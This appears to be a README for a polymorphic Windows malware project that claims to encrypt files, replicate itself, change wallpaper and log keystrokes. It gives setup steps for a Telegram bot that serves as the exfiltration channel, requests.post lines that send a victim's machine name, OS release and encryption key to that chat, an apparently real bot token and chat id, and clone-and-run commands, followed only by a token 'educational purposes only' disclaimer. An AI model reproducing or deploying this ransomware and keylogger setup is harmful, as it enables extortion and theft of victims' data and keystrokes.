Simple Windows-based malware capable of encrypting files, replicating itself, changing wallpaper, logging all keystrokes by victims
You can install the Requirements by running the command:
install the libraries written in the code
Telegram api (https://core.telegram.org/bots/api)
1)open telegram
2)search BotFather
3)/newbot
4)Choose a username for your bot (malwareusername_bot)
Use this token to access the HTTP API:
3416572059:AAGB7p9WAe0jWamE89ftR02MR2WgbxlLZEg
Chat Id
1)search Json Dump Bot
2)/start
3)telegramapi
"from": {
"id": 3213112048, your chat_id
Send Message Example:
requests.post("https://api.telegram.org/bot<your_telegram_api>g/sendMessage",
data={"chat_id": "<your_telegram_chat_id>", "text": f"Node: {node} Release: {release} \nKey: {str(key)}"})
requests.post("https://api.telegram.org/bot<your_telegram_api>/sendMessage",
data={"chat_id": "<your_telegram_chat_id>", "text": f"Node: {node} Release: {release} \nKey: {str(key)}"})
$ git clone https://github.com/networkkiller/MalwarePolymorphic
$ python3 malwarepolymorfic.py
These scripts contain stuff that can get you in trouble. This is for educational purposes only. Do not abuse.